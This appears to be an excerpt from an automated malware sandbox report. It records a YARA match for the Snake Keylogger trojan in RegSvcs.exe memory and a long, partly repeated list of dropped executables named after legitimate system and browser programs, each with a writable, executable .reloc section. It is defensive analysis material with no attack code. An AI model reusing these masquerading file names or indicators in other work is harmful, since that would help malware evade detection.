            Source: Process Memory Space: RegSvcs.exe PID: 4068, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: SABXJ1B5c8.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: maintenanceservice.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msdtc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msiexec.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: PerceptionSimulationService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: perfhost.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Locator.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: MsSense.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: SensorDataService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: snmptrap.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Spectrum.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: maintenanceservice.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: minidump-analyzer.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: GoogleCrashHandler64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: GoogleUpdate.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: GoogleUpdateBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: GoogleUpdateComRegisterShell64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: GoogleUpdateCore.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: GoogleUpdateOnDemand.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: pingsender.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: plugin-container.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: jabswitch.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: private_browsing.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: java-rmi.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: updater.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Au3Info.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Au3Info_x64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AutoIt3Help.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: java.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: javacpl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: javaw.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: javaws.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: jjs.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: jp2launcher.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: keytool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: kinit.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: klist.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ktab.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ssh-agent.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: TieringEngineService.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AgentService.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: vds.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: VSSVC.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: wbengine.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: orbd.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: pack200.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: policytool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: rmid.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: rmiregistry.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: servertool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ssvagent.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: tnameserv.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: unpack200.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ie_to_edge_stub.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: WmiApSrv.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: wmpnetwk.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: SearchIndexer.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 7z.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 7zFM.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 7zG.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: cookie_exporter.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: identity_helper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: setup.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedgewebview2.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedge_proxy.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedge_pwa_launcher.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: notification_click_helper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: pwahelper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedge_proxy.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: SABXJ1B5c8.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: maintenanceservice.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msdtc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msiexec.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: PerceptionSimulationService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: perfhost.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Locator.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: MsSense.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: SensorDataService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: snmptrap.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Spectrum.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: maintenanceservice.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: minidump-analyzer.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: GoogleCrashHandler64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: GoogleUpdate.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: GoogleUpdateBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: GoogleUpdateComRegisterShell64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: GoogleUpdateCore.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: GoogleUpdateOnDemand.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: pingsender.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
